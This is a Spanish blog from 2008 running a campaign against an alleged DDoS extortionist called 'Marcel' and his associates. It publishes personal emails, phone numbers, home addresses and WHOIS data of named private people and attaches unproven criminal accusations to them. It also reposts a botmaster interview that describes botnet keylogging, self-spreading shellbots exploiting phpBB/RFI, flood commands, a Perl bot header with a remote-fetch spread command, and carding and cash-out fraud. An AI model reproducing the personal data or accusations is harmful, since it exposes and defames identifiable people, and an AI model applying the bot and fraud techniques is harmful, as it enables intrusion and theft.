sábado, 23 de febrero de 2008

Los inicios de Marcel

Rastreando
el pasado de Marcel (Agustin Buils)


Buscando el nombre Agustin Buils en google encontramos una web


http://www.google.com/search?hl=es&q=%22agustin+buils%22&meta=


encontramos un anuncio en cliclic.com 


http://www.cliclic.com/cgi-local/fantasias.pl?read=10429


el cual nos da una pista de otro de sus correos: 


rutina_servivio_hotusuarios@hotmail.com


ahora buscamos eso en google y veremos algo mas del pasado de marcel.


http://www.google.com/search?q=rutina_servivio_hotusuarios@hotmail.com&btnG=Buscar&hl=es


si se fijan todos los post o mensajes dejados con ese correo son reantiguos
esepto el siguiente


http://www.mundoanuncio.com/anuncio/solicito_ke_me_den_la_baja_rutina_servivi..


tiene como fecha 15 de Febrero del 2008 xD esta muy fresco , y con un
cuentito diciendo que tiene 32 años bla bla bla, oviamente es Marcel tratando
de ocultar su pasado pero dale sigamos buscando y nos daremos cuenta que es
Marcel 100% Marcel.


http://www.cliclic.com/cgi-local/adultos.pl?read=34374


Donde Marcel busca tias gordas con la fecha del 2004 (A nosotros no nos
interesa sus raras desviaciones sexuales)


http://www.gordos.com/Comunidad/foros-detalle.aspx?post=5244
(si no abre vease el link de abajo!)

http://64.233.169.104/search?q=cache:d0QHtLGX3fIJ:www.gordos.com/defaultForos3.aspx%3FID_..

(fecha 1/20/2004)


Que dice:


Yo tengo 23 años y soy muy flaco,pesare 56
kilos,encima soy alto...en fin,no entiendo como todos siempre hay mira esa flaca
mira tal y tal.si las gordas....


 (claramente aqui Marcel se sube la edad para ligar con las tias)


Pero desde aquí pescamos otra pista: 


me gustaria hablar con alguna de ustedes: cyberssexo_latino@hotmail.com
rutina_servivio_hotusuarios@hotmail.com


Aqui tenemos el otro mail que usaba en aquellos tiempos por el 2004. 


Ahora rastrearemos su segundo correo..


http://www.google.com/search?hl=es&q=cyberssexo_latino@hotmail.com&meta=


y boila de nuevo aparece el nombre "Marcel" en los resultados QUE
CASUALIDAD CHEE!!!!! sigamos!


TESTIMONIOS "MARCEL REVOLUTIONS"


y una web que dice www.espiacorreos.com/testimonios.htm
(esta url ya no existe pero demos gracias al cache de google)


http://64.233.169.104/search?q=cache:uimZ2oeYbpQJ:www.espiacorreos.com/testimonios.htm+cyberssexo_latino%40hotmail.com&hl=es&ct=clnk&cd=1&gl=cl


Esto confirma que Marcel Tenia una Web hace años llamada ESPIACORREOS.COM


y el mismo postea en sus testimonios xD pero ese no es el caso sino que
llegamos a su vieja Web.


en la que el pone el siguiente texto:


Debajo están algunos
comentarios que hemos recibido de nuestros clientes. Si usted quisiera expresar
su opinión sobre nuestros programas, envíenos un mail a
webmaster@espiacorreos.com

Uno de los pocos sitios Web en el mundo en colocar la dirección de mail de los
testimonios, habitualmente encontramos testimonios falsos, sin ningún mail, ni
dato que haga valido el testimonio, claro, no todos nuestros testimonios quieren
mantener su mail en publico, pero hemos puesto el mail de todos aquellos que si
aceptaron.


Importante: Los mensajes pueden
contener errores de ortografía, ya que son testimonios 100 %, y se publican sin
ninguna modificación ni alteración, es decir, que si alguien hablara de
quejas, también se publicarían.


donde el mismo ivento un testimonio haciéndose pasar por un tal Hernan.


Tipico de este boludo siempre falsea y miente en sus webs. Seguramente todos
los demas testimonios de su vieja web tambien son falsos con correos creados por
el para que si alguien pregunta el responda diciendo que su servicio es excelentísimo.


Lo que sabemos que en esa web ESPIACORREOS Marcel vendia programas para robar
contraseñas y un acceso a una seccion privada donde tenia EXPLOITS DE HOTMAIL.
Puro pishing que mandaba postales falsas de gusanito y diversos servicios web,
con la cual urtaba las contraseñas.


Actividad puramente ilegal, cobrar por un servicio de  violar la
privacidad de otras personas.


Para saber mas de su vieja web de Marcel revisad


http://www.google.com/search?hl=es&q=site%3Aespiacorreos.com&meta= 
Notese que dice MARCEL por todo lado! en los Titulos Casualidad tambien?


Y revisar en todos los links asiendo clic en CACHE! por que la web ya no
existe.


http://64.233.169.104/search?q=cache:CFMvaNmzMdUJ:www.espiacorreos.com/+espiacorreos.com&hl=es&ct=clnk&cd=1&gl=cl


donde otra ves se menciona el mismo xD


Nuestra compañía “Marcel Revolutions”, desde su
fundación, hemos tratado de mejorar continuamente nuestra posición en el
mercado, centrando todos nuestros esfuerzos en ofrecer, día a día,


jeje véase las fechas de fundación ... com fundó
www.espiacorreos.com en el
2003 


Y bueno eso es para los que no conocían el pasado de Marcel pero ya muchos
conocen su pasado de marcel en especial Emilio Rivera, cuando lo detengan pueden
interrogarlo, por las actividades ilícitas de su camarada Agustin Buils alias
Marcel.

viernes, 22 de febrero de 2008

La ultima de Agustincito

Este resumen no está disponible. Haz clic en este enlace para ver la entrada.

lunes, 18 de febrero de 2008

Rescatando: Entrevista: Botnets... el lado oscuro

Saludos nuevamente aqui tratando de rescatar la información en la red. 


Parece que están ocurriendo mas cosas extrañas en la red. 


Hay un tread en un foro no muy conocido donde salía una comprometedora
entrevista a Morgan! Doseador y Carder Argentino.


Bien el link es este:


http://www.securityadiction.com/index.php?name=News&file=article&sid=24


Pero a desaparecido la información ahora sale el mensaje 


Lo sentimos pero no tienes autorización para leer esta noticia
completa 


No sabemos si es cosa de morgan  o quisa cosa de los dueños del foro
para obligar a registrarce o protegerce de atackes por culpa de ese articulo,
quien podría hacer los ataques, alguien se imagina quien puede querer evitar
que aparezca esta info, en fin no se la razon asi que pondre una copia de
dichoso articulo.


Presten atención a la entrevista de este capuyo como se ensucia con sus
propios argumentos:


 


Virus: Entrevista: Botnets... el lado oscuro



Botnets, redes Zombie, shellbots, winbots… quien no ha oído hablar de alguno
de esos términos, muchos se preguntaran ¿quien los hace? ¿Por qué lo hacen?
¿Qué significa?, hoy gracias a una entrevista a fondo y en exclusiva a un
conocido manipulador, programador, creador de inteligencia artificial (bots)
podemos responder y aclarar el panorama acerca de este tema.




La siguiente entrevista se realizo con Morgan joven argentino que con
solo unos años de edad ya es conocido personaje del ámbito under no solo en
Argentina sino también en muchos países internacionales, incluso mas de una
vez ha aparecido en listas de virus, seguridad, y por que no también decirlo en
foros y otros lugares donde gente sin experiencia busca información acerca de
este tema.



Morgan, ¿criminal?, ¿hacker?, ¿un dios?, en esta
entrevista se hablo de muchas temáticas, incluyendo respuestas fuera de lo común,
lo que nadie se atrevió a dar a conocer, la explicación que muchos buscan, el
inicio de la información…



Damos gracias a el por habernos brindado esta entrevista, léanla atentamente ya
que hay muchas cosas que deberían saber y nosotros gracias a el las hacemos
publicas.





SA: Antes que nada, hace cuanto tiempo llevas metido en el tema de botnets y
como se te ocurrió empezar en esto?



Morgan: Me interesó el tema en el año 2002/2003 no recuerdo bien. Un amigo,
quien ya tenia su primer Bot formaba parte de un grupo que Hacían un bot
llamado Prototype (pTy)

Me había mostrado un par de veces Sus canales con Botnets ...y las cosas que

podía hacer, entonces decidí averiguar un poco del tema.





SA: Tenemos entendido que la gran mayoría de personas que tienen botnets lo
usan

para ataques de denegación de servicio, que otra utilidad les dan además de
eso?



Morgan: La denegación de servicio fue un furor estos años para mucha gente, yo
al principio los utilizaba para sacar claves... dejaba la función KeyLog de el
bot encendida hacia algún canal ejemplo #Info y con algún script de mIRC
grababa todo lo que había en #Info



(on *:text:*:#info:write c:/info.txt $1-)



Al día siguiente me pasaba un buen rato viendo que había capturado el KeyLog
...

Encontraba cuentas bancarias, paypals, servidores roots, Ftp’s, correos,

sitios del gob. Luego de eso comencé a usarlos para la denegación de servicio

Me parecía divertido, todos temían de que yo les agarre la IP jaja…

en los servidores IRC tenia lo que quería con solo pedirlo (ips de usuarios, O:

lines etc.), la utilidad que prefiero darles ahora es Crear algunos programas
por ejemplo para Hacer falsos clicks en AdSense o Testear otras cosas... la
verdad ahora no uso (winbots) para atacar. Solo los uso para sacar información
como hacia antes



SA: Winbots, hemos visto muchos códigos hablemos de shellbots (exp) es mas
poderosa una botnet con shellbots que una con winbots?



Morgan: Los shellbots los conocí creo en el año 2004 o 2005. Antes era un
simple script en perl que dejaba controlar la shell desde el IRC, con la opción
de hacer un UdpFLood, Tcpflood.

En el 2005 con el error de PhpBB (viewtopic.php?t=) Era una locura que tantos

sitios estén vulnerables a alguien se le ocurrió la idea de editar ese
Shellbot para que Busque en google los foros PhpBB y los infecte automáticamente

Y decidimos Hacerlo… Me acuerdo muy bien esa noche cuando se probaba el código.

Cuando comenzó a funcionar, nosotros teníamos un par de IRcd linkeados que

soportábamos 3072 usuarios (nunca pensábamos en llenarlo) fue una cosa de
locos, Lanzar el bot a buscar y ver como llovían... pero miles de Shellbots.



Era una cosa impresionante que hasta el día de hoy en los Winbots yo nunca he

Visto En cuestión de un par de minutos, ya se habían llenado los 3 servidores.
(3050 servidores WEB. los que equivalían a miles pero miles de maquinas de
Windows "normales" infectadas) Me acuerdo que alguien que estaba con
migo y otra gente en el Canal de pruebas Se fue porque tenia miedo de tener algún
problema. Jaja…

La cosa es que ese código se hizo muy conocido y luego Google cambio el método

de la búsqueda y el método de mostrar los resultados Ese shellbot todavía
sigue por ahí en Internet, creo que había 40.000 sitios vulnerables.

Luego que paso todo eso, en el 2006 yo decido arreglar la Versión de ese Bot

pero con otras funciones.

Por ejemplo este bot Buscaba lo que querías en google no solamente como antes

(phpbb) sino que ahora podías aprovechar cualquier tipo de vulnerabilidad RFI

Para tener tu Botnet. Yo estaba en la red Gigachat donde toda la gente utilizaba
mi código para infectar sitios y defacearlos o que se yo.

Cuando publique El código, que todavía lo tengo guardado:



#!/usr/bin/perl

# VulnScan v6 Stable By Morgan

#

# Note:

# DO NOT REMOVE COPYRIGHTS ...

# www.priv8.com.ar

#

# [Morgan]: http://priv8.com.ar/Zerocool.jpg

# [Morgan]: u got owned

# [ZEROCOOL]: bro

# [ZEROCOOL]: it's a rbot

# [ZEROCOOL]: i'm not fuckingstupid

# [ZEROCOOL]: uahuahuahuahua

#

#

# Greets to irc.gigachat.net :: #Morgan

#

#

# To work with auto-spread :

# Create a file named spread.txt with this :

#

#

#

# Change the url .. put ur bot url in that file

# then use the command :

#

# !morgan !eval @cmdstring='http://yoursite.com/spread.txt';

# or directly change it from the code..

#

# Enjoy the bot ....

# /Morgan



Bueno en fin. hoy en día los shellbots los usan casi todos, ya no prefieren

usar winbots ya que rinden mucho menos ahora los utilizan para Buscar en google
sitios vulnerables y defacearlos (A mi

criterio una estupidez)

Y claro el típico ddos... que ahora cualquiera se la da de Haxor con un par de

bots :o)



SA: Si bien cada bot tiene cierta cantidad de fallos por los cuales escanear

explotan y se reproducen (se denominan spreaders) es posible

darles comandos como por ejemplo: update?



Morgan: Si, yo tengo una versión con el comando !Update que lo que hacia era
bajar el nuevo bot de alguna URL matar el proceso del bot actual y ejecutar el
nuevo (Muy similar a los winbots)











SA: Los códigos llamados 0day o bots nuevos que no son públicos, generalmente
se

venden o intercambian, ahora en el caso de querer comprarlos se puede comprar
con datos de alguna cuenta paypal o tarjeta de crédito digamos hacer una
transferencia a esta X persona que tiene el código o generalmente es de otra
forma?



Morgan: Yo nunca he vendido/comprado 0day's siempre los regalo (que buena
persona)

Pero alguna que otra vez he recibido un buen $$ por dar algunos 0day



SA: El tema de irc donde se alojan los bots... hay gente de empresas que
realmente sepan que tienen alojado este tipo de irc y por temor o X motivo hacen
"la vista a un lado"?



Morgan: Yo conozco empresas que el mismo dueño aloja botnets en ella, pero no
deja que

sus clientes lo hagan. El problema de eso es cuando alguna Web de antivirus o lo
que sea Desencriptan tu bot y denuncian la IP del botnet.



SA: A tu criterio que tan vulnerable son los sistemas Windows? en el caso de las

botnets que sistema es mas propicio a infectar Windows o Linux?



Morgan: Prefiero infectar servidores en Linux, en Windows es como que ya me
aburro no le

veo la gracia, salvo que encuentre alguna cosa nueva para hacer Son muchísimos
mas vulnerables los sistemas en Windows.



SA: Los bots poseen algún tipo de identificación que te permita saber de que
país provienen?



Morgan: Hay versiones de Winbots y Shellbots que detectan el país, lenguaje o
sistema

donde están ejecutados y hasta tienen de nick el país...

Por ejemplo:

[05|USA|XP|SP0]-7271



EL 05 es la cantidad de días, USA es su país, XP el sistema operativo y SP0 en

esa versión indica que service pack lleva



En shellbots:

[BR]-91827374

[USA]-12938582

[UK]-19237214

País - números y letras aleatorias.



SA: Podes comentarnos algunas funciones de ellos?



Morgan: Acá tenes algunas, http://www.darksun.ws/phatrxbot/rxbot.html :)

Y en los Shellbot... los mas usados son el !scan , !udpflood !tcpflood !synflood

!httpflood y !portscan



SA: En tu caso principalmente que objetivo buscas al tener una botnet? ego
propio, ataques de denegación, obtener datos...



Morgan: Yo los tengo porque son de utilidad muchas veces, ya sea para hacer algún
pequeño ddos, sacar alguna info, entrar en algún servidor

















SA: Denegación de servicio... alguna empresa te ha pagado alguna vez por este

servicio?



Morgan (nos cita un documento en la Web que habla de el): En 9 días hemos
recibido 6 ataques masivos a nuestro sitio Web, motivo

por el cual de manera constante nos han tirado abajo los servidores.

Algunos de los servers: que el joven: "MORGAN", se ha encargado de
ATACAR

FEROZMENTE, son:

1) http://www.freesevers.com

2) http://www.fortunecity.com

3) http://www.adwarspace.com

4) http://www.110mb.com

5) http://www.googlepages.com

También los servidores de nuestro Foro de Discusión están recibiendo ataques

Masivos, y en estos momentos se está trabajando para ponerlo nuevamente ON LINE.



Por esta TAN NOBLE TAREA, "Morgan" (que algún día les contaré quien
es, a que se

dedica, y muchas otras cosas mas) cobra la nada despreciable suma de $ 3.000

mensuales, desde el mes de mayo de este año.



SA: Cuanto tardaría una persona en obtener digamos un par de cientos de bots a

partir de uno solo?



Morgan: Depende... una persona con recursos y conocimientos... minutos, una
persona que ha creado su primer botnet y es su primera experiencia y no tiene
recursos puede tardar un poco



SA: La pregunta del millón: ¿es verdad que obtenes acceso a cuentas de banco
papals

datos de tarjeta de crédito y parecidos con ellos? y luego... es posible
"retirar dinero" de esas cuentas para beneficio propio?



Morgan: O.o

Yo Prefiero vender los datos antes que arriesgarme como antes.

Claro que es posible, en algunas épocas se pone de moda algún llamado BUG en

Western unión con el tema de las transferencias actualmente esta funcionando
con Italia y Francia, hasta hace poco con Australia.

Después están los Cashiers, que son los que les pasas las cuentas o les haces

las transferencias bancarias y ganas tu %.

Igualmente esta muy vulnerable la seguridad con el tema de compras online

(Porque a las empresas les conviene) Así que no es tan difícil ir a Amazon.com
comprarse algo con tarjeta, y crear una Suite en Skybox para recibir las cosas.



SA: Hemos tenido contacto con varias personas que mantienen botnets e incluso
nos han invitado a su irc para ver funcionar sus bot, hemos visto algo que nos
llamo la atención una especie de "mercado negro", la compra o venta
de cuentas paypal e-gold datos de tarjetas de crédito etc... sin compromisos,
podes explicar de que se trata?



Morgan: Claro, es la típica venta de garaje... se vende de todo... yo en eso
que le llamas "mercado negro" he visto desde venta de tarjetas hasta
trafico de

personas.







SA: Se puede ganar dinero no solo con ataques sino por ejemplo: generando mas
visitas en una Web realizando clicks en sistema que pagan por ello, etc.?



Morgan:

Ingresos de hoy: US$218,25

Responde eso tu pregunta? ^^





SA: Que tan seguros son los bots? es decir sabemos que alguien con pocos

conocimientos puede "robarte" una botnet lo cual podría ser un gran
desastre

como se protegen ante este tipo de ataques?



Morgan: Uff no me hagas acordar, si abre perdido bots en el camino

Lo mejor es asegurarse de usar un servidor propio, con las contraseñas del ircd

Encriptadas... y utilizar autentificacion por nick!ident@host en los bots.



SA: En argentina que tan conocido es el tema? hay mucha gente metido en esto? y

realmente acá has hecho $$ a partir de algún "servicio de denegación"



Morgan: En argentina están de moda los winbots. También hay otros que tienen
sus shellbots, pero solo porque tienen el código que los genera y listo. (Así
cualquiera)

Yo sí, sinceramente he echo bastante dinero con el ddos y con los botnets. pero

hay otras cosas para sacar más dinero.



SA: Tuviste problemas con la "ley?



Morgan: Siempre "safé”, alguna vez tuve que parar. cambiar el disco. dns.
emails etc.



SA: Cual fue a tu criterio el mejor ataque que cometiste?



Morgan: Fibertel argentina (Owned =) en la época Del Santy shellbot. con
miles...



SA: Una vez cierta persona dijo en una entrevista (conocido portal hacker solo
por el nombre) :Yo no tengo ninguna botnet. Esos son criminales. ¿Que pensas?
realmente son criminales ustedes o es mas fácil juzgar a quien los

contrata a ustedes para este tipo de ataques?



Morgan:

Criminales? no creo.

Criminales son esos hijos de puta que roban, secuestran, matan gente en

nuestro país...

Criminales son esos políticos que nos gobiernan



SA: Palabras finales...



Hm, quisiera aclarar que hoy en día no realizo NINGUNA de las actividades
estas,



Be safe.

/Morgan



#EOF



En el transcurso de los días crearemos un video documental donde veremos la
“acción” por dentro de estos bots, como infectan realmente, donde
buscarlos, el mercado negro, y mas para que ustedes puedan observar mas
detenidamente este movimiento Ander que no tan conocido se lleva mucha ventaja
de otros…



Nota: Security Adiction = SA


 


 


PD: El pez por la boca muere!


 

domingo, 17 de febrero de 2008

Rastreando a Rivera Emilio (ddos manager)

DATOS BASE

DATAFULL.ORG es de Rivera Emilio

Se dedican a combatir el ddos con sus clientes, osea domina la tematica ddos.

Emilio alias Fenix (ddos manager altamente reconocido en su Pais)

Emilio ya no vive en Argentina, se rumora que esta viviendo en Peru.

Buscaremos alguno de sus paraderos en Peru.


SEGUIMIENTO


En primera instancia nos llego el rumor de que Rivera emilio ya no vive en
Argentina hace buen tiempo, sino que se fugo a Peru.


Entonces trabajaremos con esa base:


Con algunos whois a sus paginas encontramos ciertas pistas


que nos llevan con tribal host 


Technical Contact:

   

   eduardo espinoza suarez  a19947097@pucp.edu.pe 

  .2742840 <--Analizamos este telefono para dar con la direccion....

   Fax: 

   monte cedro mz r1 lote 17

   urbanizacion benavides-surco

   lima,  li 33

   PE


Tenemos un telefono valido el cual investigaremos y nos da el siguiente
resultado:





















AV Velasco Astete Pi:4 3327 401 Urb.
Prolongacion Benavides

Santiago de Surco, LIMA

(+51) (1) 274-2840



ya tenemos 2 coincidencias! y es con surco!


ahora analizamos el correo  a19947097@pucp.edu.pe 
y oh sorpresa encontramos otra relacion con Argentina tierra natal de Emilio
Ribera


Links obtenidos por google buscador


http://www.viajeros.com/modules.php?name=Forums&file=viewtopic&t=2639&view=next&sid=c8d014b65c35fb3ae440f56b144363ff


Copia cache en caso de perdida del post


http://64.233.169.104/search?q=cache:7N2Y..


del cual extraemos nuevamente el nombre eduardo espinoza


Hola, mi nombre es eduardo espinoza y soy de lima-peru. Hace unos meses me propuse ir a buenos aires a conocer a unos amigos y amigas q encontre mediante el messenger y bueno ya me decidi a partir en marzo definitivamente. 


bueno con esto notamos que el tal eduardo es tiene amigos Argentinos , quisa
sea amigo de Rivera Emilio, encima comparten dns y registro de dominios.


Notese que el post del foro tiene como fecha 10/02/2005 osea q no puede ser
un fake hasta aqui toda la informacion es veridica.


Bueno entonces que tiene que ver tribalhost.info con datafull.org ?


y sobre el rumor de que Emilio esta profugo en Lima Peru hace buen tiempo.


Se sospecha que ellos se conocen o quisas vivan juntos... Pero bueno quien
puede dar mas informacon sobre el paradero de Emilio es Eduardo Espinoza...
quien tiene el telefono (511)274-2840.


Como se iso el seguimiento de Dns y dominios:


Con simples whois chequear a continuacion:


http://whois.domaintools.com/datafull.org


Registrant ID:DI_2615757

Registrant Name:DataFuLL.OrG

Registrant Organization:datafull.org

Registrant Street1:Libertad 75

Registrant Street2:

Registrant Street3:

Registrant City:Argentina

Registrant State/Province:Capital

Registrant Postal Code:8000

Registrant Country:AR

Registrant Phone:+54.93855953624

Registrant Phone Ext.:

Registrant FAX:

Registrant FAX Ext.:


Registrant Email: staff@datafull.org 


Name Server:NS1.PROTECCIONDDOS.ORG

Name Server:NS2.PROTECCIONDDOS.ORG


http://whois.domaintools.com/proteccionddos.org


Registrant Organization:NetFuLL InC

Registrant Street1:Santiago de Surco

Registrant Street2:

Registrant Street3:

Registrant City:Lima

Registrant State/Province:Lima

Registrant Email:
soporte@netfull.org


Name Server:NS1.PROTECCIONDDOS.ORG

Name Server:NS2.PROTECCIONDDOS.ORG


http://whois.domaintools.com/tribalhost.net


Domain name: tribalhost.net



Registrant Contact:

   

   eduardo espinoza suarez (
a19947097@pucp.edu.pe )

   .2742840

   Fax: 

   monte cedro mz r1 lote 17

   urbanizacion benavides-surco

   lima,  li 33

   PE


Name Servers:

   ns1.tribalhost.info

   ns2.tribalhost.info


http://whois.domaintools.com/netfull.org


Registrant Name:eduardo espinoza

Registrant Organization:tribalhost.net

Registrant Street1:loma de las orquideas 230

Registrant Street2:

Registrant Street3:

Registrant City:lima

Registrant State/Province:LI

Registrant Postal Code:Li33

Registrant Country:PE

Registrant Phone:+51.12747339

Registrant Phone Ext.:

Registrant FAX:

Registrant FAX Ext.:

Registrant Email:
support@limainfinita.com


http://whois.domaintools.com/limainfinita.com


eduardo espinoza suarez (a19947097@pucp.edu.pe
)

   .2742840 <- telefono real!

   Fax: 

   monte cedro mz r1 lote 17

   urbanizacion benavides-surco

   lima,  li 33

   PE


 


Nótese las relaciones! Argentina / Peru y bueno esos son algunas pistas para
dar con el paradero de Emilio ribera. Uno de los principales lacayos de Agustin
Buils ( Quienteadmite.com ).

sábado, 16 de febrero de 2008

quienteadmite.com se hace de la vista gorda

Veamos chicos, leyendo algunos blogs comentan que nuestro blog es sensacionalita
y que buscamos publicidad con el caso, eso no tiene sentido, solo queremos que
se sepa la verdad. Para que buscariamos publicidad con un blog que solo se
dedica a un tema, el dueño de quienteadmite es culpable. Una ves que termine
preso ya nadie visitara esta web.


 


Aqui unicamente damos las pistas clave para que cualquier interesado en el
tema haga su propia investigación para definir al responsable de tantos
problemas y parar sus actividades ilicitas.


Otra prueba de que Quienteadmite es culpable, es que con todo el problemon ocasionado
en el mundo blogero. cientos de webmasters saben el caso y los que conocen a
marcel, saben que es culpable y ya deben haberle puesto sobre aviso del
problema.


En su sitio web que es Quienteadmite.com a colocado noticias con fechas muy
recientes:


 


Pero sobre el caso, nada de nada, a quienteadmite no le interesa su reputación
ni la opinión publica, logico de una web de su indole que cambia el nick de sus
visitantes sin su consentimiento.


Que podria decir en su defensa Quienteadmite.com, que estaba de viaje y no se
entero del problema? que como no es verdad no quiere hacer caso? obviamente el
dueño no sabe como defenderse ya de tantas acusaciones y pues que mejor forma
que se le pudo ocurrir es ignorando el tema.


Bueno por hay investigando nos informan que Atevip.net no tiene relación
alguna con Quienteadmite


y como es lógico para alguien involucrado en estos problemas hizo un
descargo el respectivo descargo en si web: www.atevip.net 



Bueno eso se vera con el tiempo a medida que progrese esta investigación
publica. Aun se me hace sospechosa tal relación, ya que lineas mas abajo de su
descargo pone links de quienteadmite.com. 


Otra cosa es que la  pagina www.revisatumsn.net
una web nueva que promueve con insistencia el dueño de quienteadmite.com y se
dice autor del sitio. Tiene datos que lo relacionan con Atevip por ejemplo:


asiéndole un simple whois a  revisatumsn.net


   Administrative Contact:

      fernandez hilario, alejandro  

      ate vitarte <------------- ate vip
?????

      lima, lima 05103

      Peru

      6023520239      Fax -- 




y si se fijan bien Revisatumsn.net tiene links de Quienteadmite por todo lado.


bueno y viendo mejor su web revisatumsn.net encontramos este contradictorio
descargo:


 


La unica relacion entre RevistaTuMSN y
QuienTeAdmite.CoM, es el Prestamo del codigo de NoAdmitido.


Términos y
Condiciones
- Contactenos
- Privacidad

2006-2008© Quienteadmite- Portal Messenger
-staff@quienteadmite.com atencion MSN
<--------
esto no es algo unico es todo!


 


"staff@quienteadmite.com"????
como va a poner que no tienen mas relacion y luego pone quienteadmite por todo
lado, entras a cualquiera de sus menus y opciones y sigue apareciendo
Quienteadmite.com para rematar el problema, el mismo Marcel dueño de
quienteadmite pone en su nick que revisatumsn.net es proyecto suyo con lo cual desvirtúa
el descargo que se hace en la pagina Revisatumsn.net 


Me alegra saber que esta web esta teniendo frutos muchos se están enterando
y dando cuenta de la realidad, ya que cualquier cosa que haga Marcel solo revela
mas su complicidad y culpa ante todos los cargos.


Aunque algunos aun piensan que todo esto es un tema publicitario y para
muestra un botón.



Pero nuestro blog no pretende acrecentar la publicidad de sus webs sino
reunir todas las pruebas que son muchísimas y detener a este criminal.


 


Es increíble como la web de un inescrupuloso como ese tenga tal exito, pero
claro valiéndose de ing-social, amenazas, negocios fraudulentos, y cuanta cosa
sea posible realizar al mejor estilo de vito don corleone que te llama a tu casa
y te amenaza de muerte, tiene tanto exito!


Agradeceremos cualquier prueba que pueda proveer los usuarios conocedores del
caso. Ya sean logs o correos  amenazantes de este señor.


 


Analizando mejor la web de Quienteadmite.com encontramos otra pista de sus
actividades para eliminar ala competencia.



Que tales noticias eh por lo visto conocía a medesadmite.com y ya
sabemos el problemon de medesadmite al cual intentaron tirar a puro ataque ddos
terminaron perjudicando a ELSERVER.COM y todas las webs que en ella estuvieron,
algo similar paso con DATATTEC.COM pese a que tuvieron tremendo quilimbo no
isieron mas por exponer a sus atacantes para evitar la verguenza publica! Claro
no les conviene perder clientes y por efecto secundario estos doseadores y
chantajistas siguen asiendo de las suyas.


Nota : En el momento de la preparación de este articulo la web
medesadmite.com estaba off 


En el blog de Ricardo podemos hallar un poquito mas de info al respecto:


Entre sus comentarios destaco!



y bueno que mas decir que lo ovio, otro intento mas de Quienteadmite por
desaparecer a su competencia, sin importarle los demas webmasters, ni clientes
de las empresas afectadas.


Segun se el webmaster de medesadmite se pronuncio ante el problema. Pero no
logre copiar la informacion y de momento no puedo por que esta off line, y lo
curioso es que ya no esta en ELSERVER.COM seguramente esta empresa no pudo mas
aceptar su incapacidad y expulsar a su cliente a otro hosting, y con esto
alentando las actividades de los criminales ya que una ves mas se salen con la
suya.


 


 


Nota: activamos los comentarios anónimos... siéntanse seguros de
opinar gracias.


 

jueves, 14 de febrero de 2008

denuncia a Emilio Rivera

Buenas, antes que nada me presento, Me llamo gerardo y pertenezco a la
empresa West-Domains IPSN ( IPsecureNetwork ) quien hace ya años atras ha
denunciado las actividades ilegales de este tal Emilio rivera. La empresa para
la que trabajo se especializa en seguridad y sobretodo en mitigar ataques DDoS,
teniendo por suerte hasta hoy una de las redes mas seguras. Hace ya 2 años se
detectaban ataques de Emilio Rivera utilizando Botnets de otras personas para
atacar webs de servidores de IRC que eran competencia de su chat
irc.argetinachat.org que aunque nadie entraba a ese chat .. el consideraba que
el resto eran la razón por la que nadie entraba. Luego esta persona adquirió
un plan “Reseller” y registro el dominio http://www.datafull.org
desde donde provee hosting supuestamente con protecciones contra ataques .. (
osea protecciones contra el mismo ), apartir de allí comenzo a extorcionar a
personas de todos los paises para que lleven todas sus webs a sus servidores o
bien le den dinero para cesar los ataques. La información sobre este personaje
fue solicitada por el F.B.I. en el año 2007, información que nuestra empresa
posee de feacientes ataques a nuestra red que aunque no son efectivos aún asi
se encuentran en el hecho de realización de delito de “cyberterrorismo” tal
y como afirma esta agencia estadounidense.


No son las unicas personas afectadas por estos personajes que se dicen
hackers, de hecho muchisimos clientes que han venido de forma desesperada por
ataques DDoS a nuestra empresa alegan haber sido victimas de extorciones y
demases para adquirir servicios o bién entregar dinero a la empresa
datafull.org.


Por otro lado hemos podido estudiar que esta gente ataca a websites que se
encuentran desprotegidas ante estos ataques ya que el 100% de los ataques
efectuados por esta gente a websites sobre redes seguras no han surtido efecto
alguno. Ya que los ataques que esta gente envía son de muy baja escala pero aún
así efectivos en ISP’s que no tengan una red adaptada para soportar estos
ataques.


Saludos Atte.


Gerardo M. Chaile

Network Administrator

West-Domains IPSN

berggi bajo ataque ddos miles de dolares en perdida

Mas información sobre los Cyberterroristas (marcel y compañia) caso Berggi,
bien es sabido que la web quienteadmite.com a ganado un voluminoso trafico los últimos
meses y no todo limpiamente sino a costa de ing social con la falsedad de
servicio de su web, y bueno pero al punto este individuo a estado lucrando mucho
con adsense y berggi, sacando buena pasta con lo cual contrataba a peligrosos
crackers para atacar a su competencia o quien se le ponga en frente.


Marcel autor intelectual de múltiples ataques mando a bloquear berggi.com
segun nos comentaron por hay, por problemas de pagos, y como este señor es tan
buena gente decidió tirar a toda la empresa bajo puro ataque ddos. (normalmente
tipo flood udp)


una parte del log comprometedor


(22:52) : Yo no, la tiro norman, pero me va a decir con cuanto hay que
darle para cuando este online

(22:52) : Dice que va a estar un rato largo asi

(22:52) : Hizo algo parecido a lo de berggi

(22:54) : Up

(22:54) : Bueno

(22:54) : Con esa off

(22:54) : Se termina todo

(22:54) : De las notas

Fuente: RicardoGalli.com


como siempre esos crackers que ddosean la red inescrupulosamente lo hacen por
contrato de alguien y adivinen quien, pues el famoso Marcel que le sale billetes
hasta cuando va al baño al hacer sus necesidades. 


Según la investigación solo diremos que este Argentino dueño de
Quienteadmite.com antes fue dueño de webs dedicados a exploits y robo de
contraseñas, y ahora para contratando a crackers reconocidos en el ambiente de
la denegación de servicio para eliminar a su competencia o chantajear para que
coloquen su publicidad..


Este aviso para para los señores que trabajan bajo ordenes de Marcel: con
una exhaustiva investigación clasificamos a algunos de los criminales.


FeNix ( Emilio Rivera )

Ramiro

Norman



...(pronto agregaremos al resto)

 

Emilio Ribera

paginas propias: 

www.datafull.org 

www.argentinachat.org

www.Argentinacorp.com

 

 


 

 


 

Pronto mas fotos ;) si siguen con Marcel serán develados por
completo...





Si tu eres uno de esos Doseadores que trabaja para Marcel tendrás los dias
contados. Ya se iniciaron las acciones legales desde la Guardia Civil (España)
conjuntamente con el FBI (Estados Unidos), que lleva estos delitos para apresar
a estos individuos.



La explotación y extorsión en la red es un crimen que se paga con carcel. Así
también a los que contratan este servicio.

Descubriendo a Marcel y el fraude Quienteadmite.com

Reporte concreto:


Somos una sociedad, cuyas dedicaciones son la seguridad e informática
forense, hemos recibido muchos reportes, esta es una de las mas largas
investigaciones que se llevo a cabo para tener las
eficientes pruebas mas concretas que aquí se las presentamos, este sujeto se
hace llamar Marcel en Internet.


Nadie lo molesta, pero el siempre busca problemas, piensa que con ataques
DDoS puede solucionar a sus problemas laborales y malas políticas,
extorsionando a gente y manipulando a personas que no tienen nada que ver
con este ciberdelito como el mas mencionado (Ribera Emilio), entre otras
